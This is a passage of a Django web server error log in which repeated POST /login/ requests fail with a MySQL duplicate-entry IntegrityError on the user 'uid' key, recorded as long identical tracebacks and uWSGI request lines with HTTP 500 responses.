"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2849/3985] 219.228.146.247 () {48 vars in 933 bytes} [Fri Jan 15 01:29:57 2021] POST /login/ => generated 208534 bytes in 131 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2850/3986] 114.42.220.207 () {46 vars in 907 bytes} [Fri Jan 15 01:29:59 2021] POST /login/ => generated 208402 bytes in 104 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 1) +[pid: 15176|app: -1|req: -1/3987] 58.37.59.126 () {38 vars in 817 bytes} [Fri Jan 15 01:29:59 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2851/3988] 219.228.146.247 () {48 vars in 934 bytes} [Fri Jan 15 01:30:02 2021] POST /login/ => generated 208535 bytes in 215 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2852/3989] 114.42.220.207 () {46 vars in 907 bytes} [Fri Jan 15 01:30:03 2021] POST /login/ => generated 208402 bytes in 192 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 15176|app: 0|req: 2853/3990] 114.42.220.207 () {46 vars in 907 bytes} [Fri Jan 15 01:30:04 2021] POST /login/ => generated 208402 bytes in 152 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return 